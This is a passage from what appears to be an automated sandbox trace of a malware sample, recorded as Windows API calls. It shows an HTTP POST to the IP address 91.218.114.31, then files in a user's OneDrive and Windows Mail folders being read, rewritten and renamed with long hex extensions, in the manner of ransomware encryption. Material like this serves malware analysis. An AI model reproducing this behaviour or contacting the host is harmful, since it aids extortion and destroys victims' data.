lpUrlComponents=0x4ebe1b0 | out: lpUrlComponents=0x4ebe1b0) returned 1 [0176.962] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Edg/84.0.522.40", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0176.962] InternetConnectA (hInternet=0xcc0004, lpszServerName="91.218.114.31", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0176.963] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84083100, dwContext=0x0) returned 0xcc000c [0176.963] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x316b18*, dwOptionalLength=0x77) returned 1 [0177.768] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x4ebdf90, lpdwBufferLength=0x4ebe1f0, lpdwIndex=0x0 | out: lpBuffer=0x4ebdf90*, lpdwBufferLength=0x4ebe1f0*=0x3, lpdwIndex=0x0) returned 1 [0177.768] atoi (_Str="200") returned 200 [0177.768] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0177.768] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0177.769] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0177.769] GetProcessHeap () returned 0x270000 [0177.769] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x316b18 | out: hHeap=0x270000) returned 1 [0177.769] ExitProcess (uExitCode=0x0) Thread: id = 17 os_tid = 0x840 Thread: id = 18 os_tid = 0x844 Thread: id = 19 os_tid = 0x674 Thread: id = 20 os_tid = 0x178 Thread: id = 21 os_tid = 0x708 [0088.117] CoGetContextToken (in: pToken=0x6f8f8e4 | out: pToken=0x6f8f8e4) returned 0x0 [0088.117] CObjectContext::QueryInterface () returned 0x0 [0088.117] CObjectContext::GetCurrentThreadType () returned 0x0 [0088.117] Release () returned 0x0 [0088.117] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 22 os_tid = 0xc8 Thread: id = 25 os_tid = 0x8c8 Thread: id = 26 os_tid = 0x8d8 [0101.213] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0101.214] CoGetContextToken (in: pToken=0x700f364 | out: pToken=0x700f364) returned 0x0 [0101.214] CObjectContext::QueryInterface () returned 0x0 [0101.214] CObjectContext::GetCurrentThreadType () returned 0x0 [0101.214] Release () returned 0x0 [0101.214] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0101.214] CoUninitialize () [0128.238] CoUninitialize () Thread: id = 104 os_tid = 0xaec [0142.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0156.308] ReadFile (in: hFile=0x5ac, lpBuffer=0x75826a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7562568 | out: lpBuffer=0x75826a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7562568) returned 1 [0156.310] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0156.323] WriteFile (in: hFile=0x5ac, lpBuffer=0x75826a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7562568 | out: lpBuffer=0x75826a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7562568) returned 1 [0156.345] RtlInterlockedCompareExchange64 () returned 0x4 [0156.345] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0160.742] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7422118, ReturnLength=0x714f8ac) returned 0x0 [0160.743] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml", lpString2=".28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml.28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml.28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546" [0160.743] GetProcessHeap () returned 0x270000 [0160.743] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420660 [0160.743] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x714f89c, FileInformation=0x7420660, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.916] CloseHandle (hObject=0x590) returned 1 [0160.920] GetProcessHeap () returned 0x270000 [0160.921] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0160.921] RtlInterlockedCompareExchange64 () returned 0x6 [0160.921] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0161.038] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0161.040] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll", lpString2=".133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll.133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll.133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237" [0161.040] GetProcessHeap () returned 0x270000 [0161.040] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x184) returned 0x426a368 [0161.041] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x714f89c, FileInformation=0x426a368, Length=0x184, FileInformationClass=0xa) returned 0x0 [0161.161] CloseHandle (hObject=0x5ac) returned 1 [0161.165] GetProcessHeap () returned 0x270000 [0161.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0161.169] RtlInterlockedCompareExchange64 () returned 0x3 [0161.169] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.091] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.092] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.093] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.110] RtlInterlockedCompareExchange64 () returned 0x0 [0162.110] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.111] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0162.113] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png", lpString2=".9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png.9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png.9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F" [0162.113] GetProcessHeap () returned 0x270000 [0162.113] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x328420 [0162.113] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x714f89c, FileInformation=0x328420, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0162.224] CloseHandle (hObject=0x5ac) returned 1 [0162.267] GetProcessHeap () returned 0x270000 [0162.268] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0162.268] RtlInterlockedCompareExchange64 () returned 0x2 [0162.268] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.949] ReadFile (in: hFile=0x5b8, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.950] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.963] WriteFile (in: hFile=0x5ac, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.972] RtlInterlockedCompareExchange64 () returned 0x1 [0162.972] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.089] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0163.092] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll", lpString2=".52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll.52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll.52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B" [0163.092] GetProcessHeap () returned 0x270000 [0163.092] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420db8 [0163.093] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x7420db8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.101] CloseHandle (hObject=0x5b8) returned 1 [0163.248] GetProcessHeap () returned 0x270000 [0163.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0163.250] RtlInterlockedCompareExchange64 () returned 0x1 [0163.250] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.311] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.311] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.312] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.317] RtlInterlockedCompareExchange64 () returned 0x0 [0163.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.318] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0163.319] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log", lpString2=".11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log.11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log.11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C" [0163.319] GetProcessHeap () returned 0x270000 [0163.319] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427ae88 [0163.319] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x427ae88, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.321] CloseHandle (hObject=0x5b8) returned 1 [0163.325] GetProcessHeap () returned 0x270000 [0163.326] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.326] RtlInterlockedCompareExchange64 () returned 0x1 [0163.326] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.331] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0163.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.333] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0163.334] RtlInterlockedCompareExchange64 () returned 0x0 [0163.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.335] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7422118, ReturnLength=0x714f8ac) returned 0x0 [0163.336] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log", lpString2=".D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log.D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log.D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E" [0163.336] GetProcessHeap () returned 0x270000 [0163.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b010 [0163.336] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x427b010, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.351] CloseHandle (hObject=0x594) returned 1 [0163.356] GetProcessHeap () returned 0x270000 [0163.358] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.358] RtlInterlockedCompareExchange64 () returned 0x2 [0163.358] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.562] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.564] RtlInterlockedCompareExchange64 () returned 0x0 [0163.564] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.579] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.580] RtlInterlockedCompareExchange64 () returned 0x0 [0163.580] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.671] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0163.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.672] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0163.674] RtlInterlockedCompareExchange64 () returned 0x0 [0163.674] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.675] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x74c20b8, ReturnLength=0x714f8ac) returned 0x0 [0163.677] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log", lpString2=".823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724" [0163.677] GetProcessHeap () returned 0x270000 [0163.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13e) returned 0x328b48 [0163.677] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x328b48, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0163.679] CloseHandle (hObject=0x58c) returned 1 [0163.707] GetProcessHeap () returned 0x270000 [0163.709] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.709] RtlInterlockedCompareExchange64 () returned 0x1 [0163.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.714] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0163.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.716] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0163.717] RtlInterlockedCompareExchange64 () returned 0x0 [0163.717] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.718] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x74c20b8, ReturnLength=0x714f8ac) returned 0x0 [0163.720] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log", lpString2=".3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69" [0163.720] GetProcessHeap () returned 0x270000 [0163.720] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4257550 [0163.720] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x4257550, Length=0x148, FileInformationClass=0xa) returned 0x0 [0163.722] CloseHandle (hObject=0x58c) returned 1 [0163.753] GetProcessHeap () returned 0x270000 [0163.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.755] RtlInterlockedCompareExchange64 () returned 0x1 [0163.755] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.763] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.763] 